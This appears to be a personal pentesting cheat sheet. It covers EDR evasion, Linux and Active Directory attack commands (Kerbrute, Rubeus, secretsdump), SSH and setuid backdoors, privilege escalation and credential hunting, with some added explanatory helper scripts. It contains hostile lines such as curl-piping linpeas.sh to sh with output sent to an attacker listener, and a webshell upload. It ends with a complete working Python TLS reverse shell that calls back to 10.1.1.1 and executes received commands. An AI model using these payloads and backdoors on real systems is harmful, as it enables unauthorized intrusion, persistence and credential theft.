Direct System Calls: Many EDRs hook user-mode API functions in ntdll.dll to observe calls such as memory allocation and thread creation. Issuing the syscall instruction directly (or through unhooked stubs) sidesteps those hooks; kernel-side telemetry such as ETW and kernel callbacks still sees the effect.
Rootkits: Advanced rootkits can operate at a low level on a computer system, potentially allowing them to evade EDR systems by hiding their presence.
Memory Exploits: Exploiting vulnerabilities that allow for the execution of code directly in memory can sometimes bypass the file-based monitoring of EDR systems.
Custom Malware: Creating unique malware that hasn't been encountered by an EDR can be a way to bypass its signatures and heuristics.
Tool and Script Modification: Modifying existing tools and scripts to alter their behavior or obfuscate their intent can help in evading EDRs that are signature-based.
Encryption and Obfuscation: Encrypting or obfuscating command and control communication can bypass network-based detection mechanisms of EDR systems.
Decoy Processes: Creating decoy processes can distract the EDR system while the actual malicious process runs undetected.
Living Off the Land (LotL) Techniques: Using built-in, signed system tools to carry out attacks can avoid detection because those binaries are usually trusted or allowlisted by EDR policy, although many EDRs now flag suspicious command lines and parent-child process chains for them.
Timestomping: Modifying file timestamps (created, modified, accessed) so a dropped file blends in with its neighbours and evades triage based on recently changed files. On NTFS the $STANDARD_INFORMATION timestamps are easy to change, while the $FILE_NAME timestamps usually still reveal the true time.
Start an SMB server: sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali . (share named kali serving the current directory; add -smb2support for modern Windows clients)
scp important.txt [email protected]:/home/ubuntu/transferred.txt
wget http://127.0.0.1:8000/file
Find a file -- find . -name thisfile.txt
2>/dev/null - discard errors (redirect stderr to /dev/null); append it to find commands to hide "Permission denied" noise
ipconfig /all
ls -lah
find searches for files and directories using filters (name, type, permissions, owner, size, modification time).
sudo -l lists the programs which sudo allows your user to run
The id command in Linux prints the user and group names and numeric IDs (UID and GIDs) of the current user or any other user on the system. It is useful to find out the following:
User name and real user id.
Find out the specific Users UID.
Show the UID and all groups associated with a user.
List out all the groups a user belongs to.
Display security context of the current user.
head/tail - to cat the first or last 10 lines of a file. -n can be used to show a specific number of lines.
ID kernel version - uname -a OR cat /proc/version OR cat /etc/issue (the last shows the distro banner rather than the kernel)
chmod command is used to change the access mode of a file.
Options Description
`-R` Apply the permission change recursively to all the files and directories within the specified directory.
`-v` It will display a message for each file that is processed. while indicating the permission change that was made.
`-c` It works same as `-v` but in this case it only displays messages for files whose permission is changed.
`-f` It helps in avoiding display of error messages.
`-h` Change the permissions of symbolic links instead of the files they point to.
Operators Definition
`+` Add permissions
`-` Remove permissions
`=` Set the permissions to the specified values
The following letters can be used in symbolic mode:
Letters Definition
`r` Read permission
`w` Write permission
`x` Execute permission
The following references are used:
Reference Class
u Owner
g Group
o Others
a All (owner,groups,others)
John the ripper
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Generate a new password hash with a password of your choice:
mkpasswd -m sha-512 newpasswordhere
manual ping sweep - for i in $(seq 254); do ping 10.0.0.${i} -c1 -W1 & done | grep from
find strings of IP addresses: grep -oE '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' ips.txt (-o prints only the matching text; the pattern also matches out-of-range values such as 999.999.999.999, so validate the hits)
-B N show N lines before the match
-A N show N lines after the match
-C N show N lines before and after the match
:w writes the contents of the work buffer to the file
:q quit
:q! quit without saving changes
ZZ save and quit
:wq save and quit
:w filename saves to filename (allows you to change the name of the file)
i insert text before cursor
Esc leave insert mode (back to command mode)
exploitdb - /usr/share/exploitdb
wordlists - /usr/share/wordlists
ssh config - /etc/ssh/sshd_config
lsass - mimikatz
lsass - nanodump
Bloodhound
Kerbrute - enumerate users on the domain: ./kerbrute_linux_amd64 userenum --dc 10.10.251.86 -d spookysec.local /home/jon/Desktop/attacktivedirectory_usrlist
Rubeus - a powerful tool for attacking Kerberos: brute-forcing / password spraying and harvesting tickets. Before password spraying with Rubeus, add the domain controller's name to the Windows hosts file from the machine using echo: echo 10.10.251.247 CONTROLLER.local >> C:\Windows\System32\drivers\etc\hosts. Password spray attack: Rubeus.exe brute /password:Password1 /noticket. Kerberoast: Rubeus.exe kerberoast. Harvest TGTs (ticket granting tickets) every 30 seconds: Rubeus.exe harvest /interval:30
AS-REP Roasting dumps the AS-REP hashes ($krb5asrep$ format; hashcat mode 18200) of user accounts that have Kerberos pre-authentication disabled. Unlike Kerberoasting these users do not have to be service accounts; the only requirement to AS-REP roast a user is that pre-authentication is disabled on the account.
SMBclient Enumerate SMB smbclient -L 10.10.9.47 -U
crackmapexec - see if we have access to shares: crackmapexec smb 10.10.9.47 -u guest -p "" --shares. Modules: -M spider_plus walks every readable share and lists the files; don't forget the crackmapexec modules.
Enum4linux - enumerates SMB/RPC information (users, groups, shares, password policy, OS) from Windows and Samba hosts, so it works well against Active Directory: enum4linux -a <target>. Append | tee "file name" to also save the output to a file.
SMBclient - connect to shares: smbclient -U '%' -N \\\ # null session (empty user and password, no prompt) to connect to a Windows share OR smbclient -U '' \\\ # authenticated session (you will be prompted for a password)
Scan SMB version - auxiliary/scanner/smb/smb_version. Brute-force or password spray AD - auxiliary/scanner/smb/smb_login
SMBclient - to list file shares: smbclient -L \\...\ ; to browse into a directory append the directory name after the "\". Finding the IP for * in Windows: https://networking.grok.lsu.edu/article.aspx?articleid=14842
AD Attack Privilege Requirements
- Kerbrute Enumeration - No domain access required
- Pass the Ticket - Access as a user to the domain required
- Kerberoasting - Access as any user required
- AS-REP Roasting - Access as any user required
- Golden Ticket - Full domain compromise (domain admin) required
- Silver Ticket - Service hash required
- Skeleton Key - Full domain compromise (domain admin) required
Definitions
Kerberos is the default authentication protocol for Windows domains. Use enum4linux to pull SMB/RPC information from the domain controller over ports 139/445 (RPC endpoint mapper on 135).
Use secretsdump.py to retrieve all of the password hashes the account is allowed to pull (with replication rights this is a DCSync over DRSUAPI) - example: python3 secretsdump.py spookysec.local/backup:[email protected] -just-dc-user Administrator
Attacking Active Directory
Use Kerbrute to identify usernames associated with the Active Directory domain.
Enumerate SMB (ports 139/445) using crackmapexec, smbclient and smbmap.
Use crackmapexec to determine access to shares; don't forget the modules, e.g. -M spider_plus.
If access is gained to a user account, Rubeus can be used to harvest and brute-force tickets.
Impacket can also be used to Kerberoast with GetUserSPNs.py (located in the examples folder of impacket).
Source: https://pentest.coffee/active-directory-cheat-sheet-94e0bb9bed2
Backdooring SSH - add an SSH key to the ~/.ssh folder of the target account.
ssh-keygen, then write the content of ~/.ssh/id_rsa.pub into the target's ~/.ssh/authorized_keys and set the right permissions: 700 for ~/.ssh and 600 for authorized_keys (sshd ignores the file when it or the directory is group/world-writable).
chmod u+s (the setuid bit) can be used by a higher-privileged user to make a binary run with its owner's privileges for whoever executes it; a setuid-root copy of a shell or editor is a classic persistence backdoor.
To create a new cron job, run the following command in the terminal which edits the crontab file:
crontab -e
You can stop a single cron job by removing its line from the crontab file. To do that, run the crontab -e command and then delete the line for the specific task. Alternatively, you can stop the cron job by commenting it out in the crontab file. example: 44 3 * * * echo "hello world" > hello.txt
In our example, the value for minute is 44, and the value for hour is 3. The * sign means always. Using the * value for the day field means every day, and using the * value for the month field means every month. Setting the value for weekday to * means the job will run every day from Sunday to Saturday.
The sixth field provides the actual job or command to be executed at the scheduled time. In the case of our example, the command is echo "hello world" > hello.txt.
cat /etc/crontab
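The crontab field semantics above, as an added example that is not code from the original notes: a small parser that expands the five time fields and tests whether an entry fires at a given time, including cron's rule that day-of-month and day-of-week are OR'd when both are restricted. The sample entries are constructed; function names are assumptions for the illustration.

```python
# Added example (not from the original notes): parse crontab entries and decide
# whether one fires at a given time. Handles '*', lists, ranges and '/step'
# plus cron's day-of-month / day-of-week OR rule. Sample entries are constructed.
from datetime import datetime

# The five time fields of a crontab entry with their allowed ranges.
_FIELDS = (("minute", 0, 59), ("hour", 0, 23), ("day", 1, 31),
           ("month", 1, 12), ("weekday", 0, 7))


def _expand(field: str, low: int, high: int) -> set:
    """Expand one field ('*', '5', '1-5', '*/15', '1,15,30-40/5') into a set of ints."""
    values = set()
    for part in field.split(","):
        rng, _, step = part.partition("/")
        step = int(step) if step else 1
        if rng == "*":
            start, end = low, high
        elif "-" in rng:
            start, end = (int(x) for x in rng.split("-", 1))
        else:
            start = int(rng)
            end = high if step > 1 else start   # 'N/step' counts up from N
        if not (low <= start <= end <= high) or step < 1:
            raise ValueError(f"{part!r} is outside {low}-{high}")
        values.update(range(start, end + 1, step))
    return values


def parse_crontab_line(line: str) -> dict:
    """Split '44 3 * * * echo hi > hello.txt' into expanded fields and the command."""
    parts = line.split(None, 5)
    if len(parts) < 6:
        raise ValueError(f"not a five-field crontab entry: {line!r}")
    entry = {"command": parts[5]}
    for (name, low, high), raw in zip(_FIELDS, parts[:5]):
        entry[name] = _expand(raw, low, high)
        # Vixie cron treats a field starting with '*' as unrestricted for the
        # day-of-month/day-of-week rule, even with a step such as '*/2'.
        entry[name + "_star"] = raw.startswith("*")
    if 7 in entry["weekday"]:      # cron accepts both 0 and 7 for Sunday
        entry["weekday"].add(0)
    return entry


def fires_at(entry: dict, when: datetime) -> bool:
    """True if the entry would run during the minute containing `when`."""
    if when.minute not in entry["minute"] or when.hour not in entry["hour"]:
        return False
    if when.month not in entry["month"]:
        return False
    dom_ok = when.day in entry["day"]
    dow_ok = (when.isoweekday() % 7) in entry["weekday"]   # Sunday -> 0
    if not entry["day_star"] and not entry["weekday_star"]:
        return dom_ok or dow_ok    # both restricted: cron runs when either matches
    return dom_ok and dow_ok


def fires_at_iso(entry: dict, timestamp: str) -> bool:
    """Convenience wrapper taking an ISO 8601 timestamp string."""
    return fires_at(entry, datetime.fromisoformat(timestamp))


if __name__ == "__main__":
    # The entry from the notes above plus a constructed persistence-style one.
    for line in ('44 3 * * * echo "hello world" > hello.txt',
                 '*/15 9-17 * * 1-5 /dev/shm/.update.sh'):
        e = parse_crontab_line(line)
        print(line)
        print("  runs at 2024-10-07T03:44 ->", fires_at_iso(e, "2024-10-07T03:44:00"))
        print("  runs at 2024-10-07T09:30 ->", fires_at_iso(e, "2024-10-07T09:30:00"))
```

Useful when triaging a suspicious entry found in /etc/crontab or /var/spool/cron: feed it the timestamps from the logs and see whether the schedule explains the activity.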
nc -lvnp 9002 | tee linpeas.out #Host curl 10.10.14.20:8000/linpeas.sh | sh | nc 10.10.14.20 9002 #Victim
If you have a firmware image and want to analyze it with linpeas to search for passwords or badly configured permissions, you have 2 main options.
If you can emulate the firmware, run linpeas inside of it (assuming the firmware filesystem is mounted at /mnt):
cp /path/to/linpeas.sh /mnt/linpeas.sh
chroot /mnt
bash /linpeas.sh -o software_information,interesting_files,api_keys_regex
If you cannot emulate the firmware, use the -f </path/to/folder> parameter:
bash /path/to/linpeas.sh -f /path/to/folder
-rw-r--r-- 12 linuxize users 12.0K Apr 8 20:51 filename.txt
|[-][-][-]- [------] [---]
| | | | | | |
| | | | | | +-----------> 7. Group
| | | | | +-------------------> 6. Owner
| | | | +--------------------------> 5. Alternate Access Method
| | | +----------------------------> 4. Others Permissions
| | +-------------------------------> 3. Group Permissions
| +----------------------------------> 2. Owner Permissions
+------------------------------------> 1. File Type
https://linuxize.com/post/chmod-command-in-linux/
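As an added example (not from the original notes) tying the chmod symbolic-mode table to the ls -l layout above: parse a mode string such as -rwsr-xr-x into mode bits, apply symbolic changes like u+s, and check for the setuid bit. The mode strings in the main block are constructed and nothing here touches the filesystem; the function names are assumptions.

```python
# Added example (not from the original notes): parse an `ls -l` mode string into
# mode bits, apply chmod-style symbolic changes ("u+s", "go-w", "a=rx") and
# check the setuid bit. Pure Python; nothing here touches the filesystem.
import stat

# Bit for each (class, permission) pair, matching chmod's u/g/o and r/w/x.
_BITS = {
    ("u", "r"): stat.S_IRUSR, ("u", "w"): stat.S_IWUSR, ("u", "x"): stat.S_IXUSR,
    ("g", "r"): stat.S_IRGRP, ("g", "w"): stat.S_IWGRP, ("g", "x"): stat.S_IXGRP,
    ("o", "r"): stat.S_IROTH, ("o", "w"): stat.S_IWOTH, ("o", "x"): stat.S_IXOTH,
}
# Special bit that lives in each class's execute slot: setuid, setgid, sticky.
_SPECIAL = {"u": stat.S_ISUID, "g": stat.S_ISGID, "o": stat.S_ISVTX}


def parse_mode_string(mode: str) -> int:
    """Turn the 10-character field from `ls -l` (e.g. '-rwsr-xr-x') into mode bits.

    Character 0 is the file type and is ignored; the other nine are the
    owner/group/other triplets. 's'/'S' in an x slot carry setuid/setgid and
    't'/'T' in the last slot carry the sticky bit; upper case means the
    special bit is set but execute is not.
    """
    if len(mode) != 10:
        raise ValueError(f"expected a 10-character mode string, got {mode!r}")
    bits = 0
    slots = [(cls, perm) for cls in "ugo" for perm in "rwx"]
    for idx, (cls, perm) in enumerate(slots):
        ch = mode[1 + idx]
        if ch == "-":
            continue
        if perm == "x" and ch in "sStT":
            bits |= _SPECIAL[cls]
            if ch.islower():
                bits |= _BITS[(cls, "x")]
        elif ch == perm:
            bits |= _BITS[(cls, perm)]
        else:
            raise ValueError(f"unexpected {ch!r} at position {1 + idx} in {mode!r}")
    return bits


def apply_symbolic(bits: int, spec: str) -> int:
    """Apply a chmod symbolic mode such as 'u+s', 'go-w', 'a=rx' or 'u+x,g-w'."""
    for clause in spec.split(","):
        op_pos = next((i for i, c in enumerate(clause) if c in "+-="), None)
        if op_pos is None:
            raise ValueError(f"no operator in {clause!r}")
        classes = clause[:op_pos] or "a"      # no class letters means 'a'
        op, perms = clause[op_pos], clause[op_pos + 1:]
        if "a" in classes:
            classes = "ugo"
        mask = 0
        for cls in classes:
            for p in perms:
                if p in "rwx":
                    mask |= _BITS[(cls, p)]
                elif p == "s":
                    if cls in "ug":            # setuid/setgid; 'o+s' is a no-op like chmod
                        mask |= _SPECIAL[cls]
                elif p == "t":
                    mask |= stat.S_ISVTX
                else:
                    raise ValueError(f"unsupported permission {p!r} in {clause!r}")
        if op == "+":
            bits |= mask
        elif op == "-":
            bits &= ~mask
        else:  # '=' replaces the class's rwx bits with exactly the requested ones
            clear = 0
            for cls in classes:
                for p in "rwx":
                    clear |= _BITS[(cls, p)]
            bits = (bits & ~clear) | mask
    return bits


def is_setuid(bits: int) -> bool:
    """True when the setuid bit is set: the files `find / -perm -u=s` reports."""
    return bool(bits & stat.S_ISUID)


def to_octal(bits: int) -> str:
    """Render as the four-digit octal chmod accepts, e.g. 4755."""
    return format(bits & 0o7777, "04o")


if __name__ == "__main__":
    for line in ("-rw-r--r--", "-rwsr-xr-x", "drwxrwxrwt"):   # constructed samples
        m = parse_mode_string(line)
        print(line, to_octal(m), "SETUID" if is_setuid(m) else "")
    # A backdoor left with `chmod u+s /bin/bash` turns 0755 into 4755:
    print(to_octal(apply_symbolic(parse_mode_string("-rwxr-xr-x"), "u+s")))
```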
Getting Processes/Services to Start on Boot
Some applications can be started on the boot of the system that we own. For example, web servers, database servers or file transfer servers. This software is often critical and is often told to start during the boot-up of the system by administrators.
Enter the use of systemctl -- this command allows us to interact with the systemd process/daemon. Continuing on with our example, systemctl is an easy to use command that takes the following formatting: systemctl [option] [service]
Start
Stop
Enable
Disable
Appending & to a command (e.g. echo "Hi THM" &) runs it in the background: instead of waiting, the shell prints the job number and process ID and returns the prompt immediately, and the command's output still lands in the terminal whenever it finishes.
Check the access permissions of your users and, if your web application provides role-based access, ensure users can reach only the parts of the application they are entitled to. Nothing more or less.
User Session Testing This is very important. Ensure that user sessions end upon log off. Because if they don’t, that valid session can be easily hijacked by hackers – this process is known as session hijacking – for carrying out malicious activity.
Brute Force Attack Testing Using appropriate testing tools, ensure your web application stays safe against brute force attacks.
DoS (Denial of Service) Attack Testing Also ensure your web application stays safe against DoS (Denial of Service) attacks by using appropriate testing tools.
Directory Browsing Ensure directory browsing is disabled on the web server which hosts your web application. Because if you don’t, you’ll be giving hackers easy access to your restricted files.
python -c 'import pty;pty.spawn("/bin/bash")'
Open redirect check - add another URL as a GET parameter; if the application forwards you to the external site, the parameter is not validated:
http://example.com/?destination=https://google.com
Source - https://www.youtube.com/watch?v=jwBRgaIRdgs
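The redirect test above, as an added example that is not part of the original notes: a handler that trusts ?destination= beside one that only follows same-site paths. SITE_HOST and the function names are assumptions for the illustration.

```python
# Added example (not from the original notes): the open-redirect check, as a
# vulnerable handler next to a hardened one. SITE_HOST is assumed.
from urllib.parse import urlparse, urljoin

SITE_HOST = "example.com"


def redirect_target_vulnerable(destination: str) -> str:
    """Trusts ?destination= as given: any external URL is accepted."""
    return destination


def redirect_target_safe(destination: str, default: str = "/") -> str:
    """Only allow same-site, path-relative targets; everything else goes to `default`.

    Rejects absolute URLs, scheme-relative '//evil.com', backslash tricks and
    control characters, then resolves the remainder against the site root and
    re-checks the host.
    """
    if not destination or any(ord(c) < 0x20 for c in destination):
        return default
    # Browsers treat '\' like '/' in URLs, so '/\evil.com' becomes '//evil.com'.
    candidate = destination.replace("\\", "/")
    parsed = urlparse(candidate)
    if parsed.scheme or parsed.netloc:
        return default            # 'https://google.com', '//evil.com', 'javascript:...'
    if not candidate.startswith("/") or candidate.startswith("//"):
        return default
    # urljoin against the site root normalises '/..' style paths on our own host.
    resolved = urlparse(urljoin(f"https://{SITE_HOST}/", candidate))
    if resolved.netloc != SITE_HOST:
        return default
    return resolved.path + (f"?{resolved.query}" if resolved.query else "")


if __name__ == "__main__":
    # Constructed inputs a tester would try against the ?destination= parameter.
    for probe in ("https://google.com", "//evil.com", "/\\evil.com",
                  "javascript:alert(1)", "/account?tab=security"):
        print(f"{probe!r:28} vulnerable -> {redirect_target_vulnerable(probe)!r:28}"
              f" safe -> {redirect_target_safe(probe)!r}")
```

Allowlisting the same-site path is the usual fix; a check that merely looks for "example.com" somewhere in the string is bypassed by https://example.com.evil.net.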
"<!--" denotes the beginning of a comment in an HTML page (closed by "-->").
Inputting a link into a user field - to inject a link into a prompt or other user-supplied field, submit an anchor tag; if it renders as a link, the field is not escaping HTML:
<a href="url">link text</a>
Nmap only supports ethernet interfaces (including most 802.11 wireless cards and many VPN clients) for raw packet scans. Unless you use the -sT -Pn options, RAS connections (such as PPP dialups) and certain VPN clients are not supported. This support was dropped when Microsoft removed raw TCP/IP socket support in Windows XP SP2. Now Nmap must send lower-level ethernet frames instead.
VPN issues
https://nmap.org/book/inst-windows.html
cache:[url] Shows the version of the web page from the search engine’s cache.
related:[url] Finds web pages that are similar to the specified web page.
info:[url] Presents some information that Google has about a web page, including similar pages, the cached version of the page, and sites linking to the page.
site:[url] Finds pages only within a particular domain and all its subdomains.
intitle:[text] or allintitle:[text] Finds pages that include a specific keyword as part of the indexed title tag. You must include a space between the colon and the query for the operator to work in Bing.
allinurl:[text] Finds pages that include a specific keyword as part of their indexed URLs.
meta:[text] Finds pages that contain the specific keyword in the meta tags.
filetype:[file extension] Searches for specific file types.
intext:[text], allintext:[text], inbody:[text] Searches text of page. For Bing and Yahoo the query is inbody:[text]. For DuckDuckGo the query is intext:[text]. For Google either intext:[text] or allintext:[text] can be used.
inanchor:[text] Search link anchor text
location:[iso code] or loc:[iso code], region:[region code] Search for a specific region. For Bing use location:[iso code] or loc:[iso code] and for DuckDuckGo use region:[iso code]. An ISO location code is a short country code, for example Egypt is eg and the USA is us. https://en.wikipedia.org/wiki/ISO_3166-1
contains:[text] Identifies sites that contain links to filetypes specified (i.e. contains:pdf)
altloc:[iso code] Searches for location in addition to one specified by language of site (i.e. pt-us or en-us)
feed:[feed type, i.e. rss] Find RSS feed related to search term
hasfeed:[url] Finds webpages that contain both the term or terms for which you are querying and one or more RSS or Atom feeds.
ip:[ip address] Find sites hosted by a specific ip address
language:[language code] Returns websites that match the search term in a specified language
book:[title] Searches for book titles related to keywords
maps:[location] Searches for maps related to keywords
linkfromdomain:[url] Shows websites whose links are mentioned in the specified url (with errors)
https://securitytrails.com/blog/google-hacking-techniques
Use linpeas to identify avenues to escalate privileges in Linux. Linpeas must be served to the victim machine from a python3 HTTP server or similar (python3 -m http.server 9999 in the directory holding linpeas.sh). To pull linpeas from your attacking machine use wget, e.g.: wget 10.6.114.53:9999/linpeas.sh. The command pulls the linpeas.sh file from the hosting server.
* GTFOBins
GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems. The project collects legitimate functions of Unix binaries that can be abused to break out of restricted shells, escalate or maintain elevated privileges, transfer files, spawn bind and reverse shells, and facilitate other post-exploitation tasks.
Find the SUID files
The following command will list all of the SUID files in the system
find / -perm -u=s -type f 2>/dev/null
Find Processes running as root
ps aux | grep root
See logged-in users
w or who (ps au shows processes attached to a terminal, which also reveals who has an active shell)
Can the user run anything as another user?
sudo -l
Check for unmounted file systems/drives
`lsblk`
source: https://pentest.coffee/linux-privilege-escalation-for-oscp-and-beyond-cheat-sheet-24fb9fe13058
list of config files, logfiles that could contain cleartext passwords
System Configuration Files
/etc/passwd: Historically used for storing passwords, though modern systems use it for account information and store hashed passwords in /etc/shadow.
/etc/shadow: Stores password hashes, but misconfigurations or weak hashing can lead to vulnerabilities.
/etc/group: Similar to /etc/passwd, but for group information.
/etc/gshadow: Group password hashes, similar to /etc/shadow.
Application and Service Configuration Files
Web Server Config Files: Files like Apache's httpd.conf or Nginx's nginx.conf and associated site configuration files.
Database Config Files: Such as MySQL's my.cnf, PostgreSQL's pg_hba.conf, or similar files for other database systems.
Application-specific Config Files: Files like config.php (for PHP apps), settings.py (for Django apps), .env files, or other application configuration files.
FTP and SSH Config Files: Files like vsftpd.conf for vsFTPd or the SSH daemon config (sshd_config) rarely hold passwords themselves, but they reveal the authentication settings (anonymous FTP, PermitRootLogin, PasswordAuthentication) and the paths of keys and certificates worth collecting.
VPN Config Files: For instance, OpenVPN configuration files (openvpn.conf) might include credentials.
User Home Directories
Shell Configuration and History Files: Files like .bashrc, .bash_history, .zshrc, .zsh_history, etc., may contain inadvertently stored passwords or sensitive commands.
.netrc: Used by ftp, curl, wget and other network clients to store a login and password per host, in cleartext.
SSH Keys: Not clear-text passwords, but files like id_rsa in .ssh can be critical.
System and Application Log Files
Web Server Logs: (/var/log/apache2/access.log, /var/log/nginx/access.log, etc.) might inadvertently contain credentials passed through URLs or in POST requests.
Database Logs: SQL query logs could contain plain text credentials, especially in verbose logging modes.
Application Logs: Depending on the application, logs (/var/log/app_name/) might include sensitive information.
System Logs: (/var/log/syslog, /var/log/auth.log) can sometimes contain sensitive information, depending on the system activities and log configuration.
Miscellaneous Files
Cron Job Files: (/etc/crontab, /var/spool/cron/crontabs/) might contain scripts with embedded credentials.
Backup Files: Such as .bak, .old or .tmp files containing previous versions of configuration files, sometimes with passwords that were later removed from the live copy.
.git Configuration Files: Repositories with configuration files or code that might contain hard-coded credentials.
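As an added example (not from the original notes), the hunt above run as code: a few regexes over file contents for the patterns listed (key=value settings, credentials embedded in URLs, .netrc entries, -p/--password on command lines, AWS access key IDs). The contents in SAMPLES are constructed for the demonstration; in practice read the real files from the paths listed and pass each one to scan_text.

```python
# Added example (not from the original notes): grep-style hunt for cleartext
# credentials in the kinds of files listed above. SAMPLES holds constructed file
# contents; replace it with real files read from those paths.
import re
from typing import Iterator

# Each pattern names the capture group that holds the secret so it can be redacted.
PATTERNS = [
    ("key=value", re.compile(
        r"(?i)(?:pass(?:word|wd)?|pwd|secret|api[_-]?key|token)\w*\s*[=:]\s*['\"]?(?P<secret>[^\s'\"]+)")),
    ("url-userinfo", re.compile(r"[a-z][a-z0-9+.-]*://[^/\s:@]+:(?P<secret>[^@\s]+)@")),
    ("netrc", re.compile(r"\bpassword\s+(?P<secret>\S+)")),
    ("cli-flag", re.compile(r"(?:^|\s)(?:--password[ =]|-p(?=\S))(?P<secret>\S+)")),
    ("aws-access-key", re.compile(r"(?P<secret>AKIA[0-9A-Z]{16})")),
]
# Values that are placeholders rather than secrets; skipped to cut noise.
PLACEHOLDERS = {"xxx", "changeme", "<password>", "${password}", "null", "none"}

SAMPLES = {  # constructed sample contents, not real files
    "/var/www/html/config.php": "<?php\n$db_host = 'localhost';\n$db_pass = 'Sup3rS3cret!';\n",
    "/home/dev/.bash_history": "ls -la\nmysql -u root -pHunter2 shop\n"
                               "curl https://deploy:tok3n@git.internal/repo.git\n",
    "/home/dev/.netrc": "machine ftp.internal login dev password ftpP4ss\n",
    "/etc/openvpn/client.conf": "auth-user-pass\nremote vpn.internal 1194\n",
    "/var/log/nginx/access.log":
        '10.0.0.5 - - [07/Oct/2024:10:01:02 +0000] "GET /login?user=bob&password=changeme HTTP/1.1" 401 0\n'
        '10.0.0.6 - - [07/Oct/2024:10:01:09 +0000] "GET /login?user=bob&password=Winter2024 HTTP/1.1" 302 0\n',
    "/home/dev/.env": "AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE\n"
                      "AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\n",
}


def redact(secret: str) -> str:
    """Keep two characters so a hit can be recognised without copying the secret."""
    return secret[:2] + "*" * max(len(secret) - 2, 1)


def scan_text(name: str, text: str) -> Iterator[dict]:
    """Yield one finding per matching line: file, line number, pattern name, redacted value."""
    for lineno, line in enumerate(text.splitlines(), 1):
        for kind, rx in PATTERNS:
            m = rx.search(line)
            if not m or m.group("secret").lower() in PLACEHOLDERS:
                continue
            yield {"file": name, "line": lineno, "kind": kind,
                   "value": redact(m.group("secret"))}
            break   # one finding per line avoids double-reporting the same value


def scan_samples() -> list:
    """Run the scan over every constructed sample file."""
    return [f for name, text in SAMPLES.items() for f in scan_text(name, text)]


if __name__ == "__main__":
    for f in scan_samples():
        print(f"{f['file']}:{f['line']} [{f['kind']}] {f['value']}")
```

The patterns are deliberately loose (a hunt, not a classifier): expect some noise such as "token" variables that are not secrets, and triage each hit by opening the file. Output is redacted so the report itself does not become another cleartext credential store.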
macOS
Look into /var/log/ (and /Library/Logs/)
/dev/shm
Use the directory /dev/shm to work out of to avoid writing files to disk. It is a tmpfs mount that lives in RAM, so anything left here disappears when the system shuts down or reboots. Caveats: tmpfs pages can still be swapped out, and /dev/shm is world-readable, so other users and defenders can list whatever you drop there.
Questions:
Change stolen ssh keys to read only?
MISC
Windows stores its hosts file (equivalent to /etc/hosts) at C:\Windows\System32\drivers\etc\hosts.
Password Cracking
Basic Usage
WELCOME TO SETTING UP BLOODHOUND ENVIRONMENT**
The purpose of this is to enumerate the environment without needing to "own" a domain-joined device within the network for an internal assessment.
Dependencies
- Neo4j
- Bloodhound
- Bloodhound-Python (pulls in impacket, ldap3 and dnspython)
- domain login credentials
- visibility of a Domain Controller
Neo4j - package will come included with Kali OVA distros as well as the Kali ISO.
If not - https://installati.one/kalilinux/neo4j/
Run the following command:
sudo apt-get update
sudo apt-get -y install neo4j
OR
sudo apt update
sudo apt -y install neo4j
After installation is complete
Run the following command:
sudo neo4j console - this will start up the neo4j database locally on your host.
Navigate towards http://localhost:7474/
use the default login of neo4j/neo4j - it will ask you to change the password; pick whatever you like.
Finally, leave the instance running in a terminal tab.
Bloodhound - this tool will come included within Kali OVA distros as well as the Kali ISO
If not - https://www.kali.org/tools/bloodhound/
Run the following command:
sudo apt install bloodhound
After installation is complete
Run bloodhound - a GUI window with a login screen appears. Use the neo4j credentials you set during the neo4j setup above.
Bloodhound-Python - This tool will NOT come included within Kali. You will have to navigate towards https://github.com/fox-it/BloodHound.py
Installation - Read the README.md carefully.
BloodHound.py requires - impacket, ldap3, dnspython
This can be done with:
sudo pip3 install bloodhound - this will install all requirements
After installation you need domain credentials already in hand, to be on the internal network, and to be able to "see" a domain controller.
If all pre-reqs are met run the following command.
bloodhound-python -u <user> -p <password> -dc <domain controller> -disable-autogc -d <domain>
Feel free to add '-c all' to the end of the command if you wish to use more than just LDAP to gather more information about the domain.
This will create all json files within your current working directory.
Finally navigate back towards your Bloodhound GUI.
Go to "Upload Data" button on the right hand side.
Navigate towards your json files that bloodhound-python created and click "Open".
Allow Bloodhound to process your json files.
Once all json files have been processed you should be able to run the pre-built queries to see a nice visual view of the environment.
Crackmap exec
Powersploit
Incognito - token impersonation
Azure
Webshells
cmdasp.aspx is a webshell (reference: HTB box Devel, where it is uploaded over anonymous FTP into the IIS webroot).
put /usr/share/webshells/aspx/cmdasp.aspx c.aspx
import os
import socket
import subprocess
import ssl

# Create a socket wrapped in TLS. The original used ssl.wrap_socket() with
# PROTOCOL_TLSv1, both removed in Python 3.12; an SSLContext that skips
# certificate verification keeps the same (unverified) behaviour.
def socket_create():
    try:
        global host
        global port
        global ssls
        global s
        host = '10.1.1.1'
        port = 8443
        s = socket.socket()
        context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
        context.check_hostname = False     # must be cleared before verify_mode
        context.verify_mode = ssl.CERT_NONE
        ssls = context.wrap_socket(s)
    except socket.error as msg:
        print('Socket creation error: ' + str(msg))

# Connect to the remote listener and send the initial prompt
def socket_connect():
    try:
        ssls.connect((host, port))
        ssls.send(str.encode(os.getcwd() + ' > '))
    except socket.error as msg:
        print('Socket connection error: ' + str(msg))

# Receive commands from the remote server and run them on the local machine
def receive_commands():
    while True:
        data = ssls.recv(1024)
        if not data:          # remote side closed the connection
            break
        data = data.decode("utf-8").strip()
        print('Received: ' + data)
        if data[:2] == 'cd':
            os.chdir(data[3:])
            ssls.send(str.encode(os.getcwd() + ' > '))
        elif len(data) > 0:
            # communicate() drains stdout and stderr together; reading the two
            # pipes one after the other (as the original did) can deadlock.
            cmd = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE,
                                   stderr=subprocess.STDOUT, stdin=subprocess.PIPE)
            output_bytes, _ = cmd.communicate()
            output_str = output_bytes.decode("utf-8", errors="replace")
            ssls.send(str.encode(output_str + os.getcwd() + ' > '))
            nL = 2 if len(output_str.split('\n')) > 2 else 0
            print('Sent: ' + nL * '\n' + output_str)
    ssls.close()

def main():
    socket_create()
    socket_connect()
    receive_commands()

if __name__ == '__main__':
    main()
